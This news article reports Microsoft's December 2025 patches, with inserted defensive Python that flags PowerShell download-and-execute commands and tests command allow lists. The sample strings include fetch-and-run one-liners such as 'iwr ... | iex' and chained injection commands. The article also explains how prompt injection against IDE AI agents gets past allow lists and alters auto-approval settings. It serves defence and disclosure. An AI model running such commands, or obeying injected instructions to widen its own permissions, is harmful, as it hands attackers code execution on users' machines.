
Microsoft ended 2025 by releasing patches for 56 security flaws across the Windows platform and related products, including one vulnerability that is being exploited in the wild.
Of the 56 flaws, three are rated Critical and 53 are rated Important. Two of the flaws are listed as publicly known at the time of release. They break down into 29 privilege escalation, 18 remote code execution, 4 information disclosure, 3 denial of service, and 2 spoofing vulnerabilities.
According to data compiled by Fortra, Microsoft addressed a total of 1,275 CVEs in 2025. Tenable's Satnam Narang said 2025 is also the second year in a row that the Windows maker has patched more than 1,000 CVEs, and only the third time this has happened since the inception of Patch Tuesday.
This update is in addition to 17 flaws that the tech giant has patched in its Chromium-based Edge browser since the release of the November 2025 Patch Tuesday update. Among them is a spoofing vulnerability in Edge for iOS (CVE-2025-62223, CVSS score: 4.3).
The actively exploited vulnerability is CVE-2025-62221 (CVSS score: 7.8), a use-after-free in the Windows Cloud Files Mini Filter driver that allows an authorized local attacker to escalate privileges and gain SYSTEM privileges.
“File system filter drivers, also known as minifilters, plug into the system software stack and intercept requests intended for the file system, extending or replacing the functionality provided by the original target,” Adam Barnett, lead software engineer at Rapid7, said in a statement. “Common use cases include data encryption, automated backups, on-the-fly compression, and cloud storage.”

“The Cloud Files mini-filter is used by OneDrive, Google Drive, iCloud, and more, but as a core component of Windows, it’s still present on systems that don’t have any of these apps installed.”
It is currently unknown how and under what circumstances this vulnerability could be exploited in the wild, but successful exploitation would require an attacker to gain access to a susceptible system through other means. Microsoft Threat Intelligence Center (MSTIC) and Microsoft Security Response Center (MSRC) are credited with discovering and reporting this flaw.
According to Mike Walters, president and co-founder of Action1, attackers can gain low-privileged access through methods such as phishing, web browser exploits, or another known remote code execution flaw, and then chain that access with CVE-2025-62221 to take control of a host.
SYSTEM-level access obtained this way could be used to deploy kernel components or abuse signed drivers to evade defenses and maintain persistence, or be combined with credential theft to achieve domain-wide compromise.
The exploitation of CVE-2025-62221 led the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add it to the Known Exploited Vulnerabilities (KEV) Catalog and require Federal Civilian Executive Branch (FCEB) agencies to patch it by December 30, 2025.
The remaining two zero-days are:
CVE-2025-54100 (CVSS score: 7.8) – Command injection vulnerability in Windows PowerShell that allows an unprivileged attacker to execute code locally.
CVE-2025-64671 (CVSS score: 8.4) – Command injection vulnerability in GitHub Copilot for JetBrains that allows an unprivileged attacker to execute code locally.
Alex Vovk of Action1 said of CVE-2025-54100: "This is a command injection flaw in the way Windows PowerShell handles web content. This allows an unauthenticated attacker to execute arbitrary code in the security context of a user who executes a crafted PowerShell command, such as Invoke-WebRequest."
“This threat becomes significant when this vulnerability is combined with common attack patterns. For example, an attacker could use social engineering to convince a user or administrator to use Invoke-WebRequest to run a PowerShell snippet. This could allow a remote server to trigger a parsing flaw and return crafted content that leads to code execution and implant deployment.”
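The chain Vovk describes ends with content fetched by Invoke-WebRequest being handed to an execution context. As an added example, not code from the article or from any of the quoted vendors, the Python routine below triages PowerShell script-block log entries (Event ID 4104 style) and flags the download-and-execute pattern a defender would hunt for. The cmdlet names and aliases it matches (Invoke-WebRequest/iwr/wget/curl, Invoke-RestMethod/irm, DownloadString/DownloadFile, Invoke-Expression/iex) are standard Windows PowerShell names; the log lines and hostnames are constructed for the example.

```python
import re

# Constructed sample script-block entries, not real telemetry. Hostnames use the
# reserved .test TLD so nothing here resolves.
SAMPLE_SCRIPT_BLOCKS = [
    "Invoke-WebRequest -Uri https://updates.example.test/manifest.json -OutFile manifest.json",
    "iwr https://cdn.example.test/setup.ps1 | iex",
    "Invoke-Expression (Invoke-WebRequest -Uri 'https://cdn.example.test/x.ps1' -UseBasicParsing).Content",
    "Get-ChildItem C:\\Temp | Where-Object { $_.Length -gt 1MB }",
    "IEX (New-Object Net.WebClient).DownloadString('https://cdn.example.test/y.ps1')",
]

# Cmdlets, aliases and .NET members that pull content from the network.
DOWNLOAD_CMDLETS = re.compile(
    r"\b(Invoke-WebRequest|iwr|wget|curl|Invoke-RestMethod|irm|DownloadString|DownloadFile|DownloadData)\b",
    re.IGNORECASE,
)
# Cmdlet and alias that evaluate a string as PowerShell code.
EXECUTE_CMDLETS = re.compile(r"\b(Invoke-Expression|iex)\b", re.IGNORECASE)


def classify(block: str) -> str:
    """Return 'download-and-execute', 'download', or 'benign' for one script block."""
    downloads = DOWNLOAD_CMDLETS.search(block) is not None
    executes = EXECUTE_CMDLETS.search(block) is not None
    if downloads and executes:
        # Remote content reaches Invoke-Expression in the same block: highest priority.
        return "download-and-execute"
    if downloads:
        # Fetching alone is common and legitimate; keep it visible but low priority.
        return "download"
    return "benign"


def triage(blocks):
    """Pair every block with its verdict, preserving log order."""
    return [(classify(block), block) for block in blocks]


def count_by_verdict(blocks):
    """Summarise how many blocks fell into each verdict."""
    counts = {"download-and-execute": 0, "download": 0, "benign": 0}
    for verdict, _ in triage(blocks):
        counts[verdict] += 1
    return counts


if __name__ == "__main__":
    for verdict, block in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"{verdict:22} {block}")
    print(count_by_verdict(SAMPLE_SCRIPT_BLOCKS))
```

The two regexes are deliberately coarse: the point is to surface every block in which network content and Invoke-Expression meet, then let an analyst decide, rather than to fingerprint one exploit. In production the blocks would come from the PowerShell/Operational event log with script block logging enabled.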
It is worth noting that CVE-2025-64671 is one of a broader set of security vulnerabilities, collectively known as IDEsaster, recently disclosed by security researcher Ari Marzouk. The issues stem from adding agent functionality to integrated development environments (IDEs), which exposes new security risks in the process.
These attacks leverage prompt injection against artificial intelligence (AI) agents embedded in the IDE and combine it with the base IDE layer to achieve information disclosure and command execution.
"This is not part of IDEsaster's new attack chain as it uses the 'old' attack chain of using a vulnerable tool," Marzouk, who is credited with discovering and reporting the flaw, told The Hacker News. "Specifically, it is a vulnerable 'command execution' tool that can bypass user-configured allow lists."

Marzouk also said that multiple IDEs were found to be vulnerable to the same attack, including Kiro.dev, Cursor (CVE-2025-54131), JetBrains Junie (CVE-2025-59458), Gemini CLI, Windsurf, and Roo Code (CVE-2025-54377, CVE-2025-57771, CVE-2025-65946). Additionally, a similar vulnerability was discovered in GitHub Copilot for VS Code.
"This vulnerability indicates that it is possible to potentially execute code on an affected host by tricking the LLM into executing commands that circumvent guardrails and adding instructions to a user's 'auto-approval' settings," said Kev Breen, senior director of cyber threat research at Immersive.
“This can be accomplished through ‘cross-prompt injection,’ in which the LLM agent, rather than the user, modifies the prompt by creating its own prompt based on the contents of files or data retrieved from Model Context Protocol (MCP) servers, which are becoming increasingly popular in agent-based LLMs.”
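Marzouk's and Breen's remarks both come down to a command execution tool whose allow-list check is coarser than the commands it lets through. As an added example, not code from the article or from any of the IDEs named above, the Python below contrasts a naive allow list that inspects only the first word of a requested command with a stricter check that refuses shell control characters, refuses paths to executables, and approves subcommands rather than bare tool names. The approved-tool policy and the sample tool requests are constructed for the example.

```python
import re
import shlex

# Constructed policy: tools the user approved and, for tools that can run
# arbitrary code through a subcommand, which subcommands are approved.
# None means any arguments to that tool are acceptable.
APPROVED = {
    "git": {"status", "diff", "log"},
    "ls": None,
    "cat": None,
    "npm": {"test", "ci"},
}

# Characters that hand control to a shell: chaining, pipes, redirection,
# command substitution, grouping and line breaks.
SHELL_META = re.compile(r"[;&|<>`$(){}\n]")

# Constructed requests of the kind an IDE agent's command tool might receive.
SAMPLE_REQUESTS = [
    "git status",
    "git status; echo injected",
    "ls -la && cat /etc/hostname",
    "npm run build",
    "rm -rf build",
]


def naive_is_allowed(command: str) -> bool:
    """First-token check: the granularity a binary-name allow list provides."""
    parts = command.split()
    return bool(parts) and parts[0] in APPROVED


def strict_is_allowed(command: str) -> tuple[bool, str]:
    """Allow only a single approved tool invocation with an approved subcommand."""
    if SHELL_META.search(command):
        return False, "shell control character present"
    try:
        argv = shlex.split(command)
    except ValueError as exc:
        return False, f"unparseable command: {exc}"
    if not argv:
        return False, "empty command"
    name = argv[0]
    if "/" in name or "\\" in name:
        return False, "path to executable not allowed"
    if name not in APPROVED:
        return False, f"{name!r} not in allow list"
    subcommands = APPROVED[name]
    if subcommands is not None and (len(argv) < 2 or argv[1] not in subcommands):
        return False, f"{name} subcommand not approved"
    return True, "ok"


def evaluate(requests):
    """Map each request to (naive verdict, strict verdict, strict reason)."""
    results = {}
    for request in requests:
        strict_ok, reason = strict_is_allowed(request)
        results[request] = (naive_is_allowed(request), strict_ok, reason)
    return results


if __name__ == "__main__":
    for request, (naive_ok, strict_ok, reason) in evaluate(SAMPLE_REQUESTS).items():
        print(f"naive={naive_ok!s:5} strict={strict_ok!s:5} {reason:35} {request}")
```

Running it shows the gap: the chained and conjoined requests pass the naive check because their first word is an approved tool, while the strict check refuses them before anything is parsed. The subcommand table is the other half of the defence; a tool like npm is safe to approve only for the subcommands that cannot execute project-defined scripts.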
Software patches from other vendors
Over the past few weeks, in addition to Microsoft, other vendors have released security updates that fix multiple vulnerabilities, including:
Adobe
Amazon Web Services
AMD
Arm
ASUS
Atlassian
Bosch
Broadcom (includes VMware)
Canon
Cisco
Citrix
CODESYS
Dell
Devolutions
Drupal
F5
Fortinet
Fortra
GitLab
Google Android and Pixel
Google Chrome
Google Cloud
Google Pixel Watch
Hitachi Energy
HP
HP Enterprise (includes Aruba Networking and Juniper Networks)
IBM
Imagination Technologies
Intel
Ivanti
Lenovo
Linux distributions (AlmaLinux, Alpine Linux, Amazon Linux, Arch Linux, Debian, Gentoo, Oracle Linux, Mageia, Red Hat, Rocky Linux, SUSE, and Ubuntu)
MediaTek
Mitsubishi Electric
MongoDB
Moxa
Mozilla Firefox and Firefox ESR
NVIDIA
OPPO
Progress Software
Qualcomm
React
Rockwell Automation
Samsung
SAP
Schneider Electric
Siemens
SolarWinds
Splunk
Synology
TP-Link
WatchGuard
Zoom
Zyxel
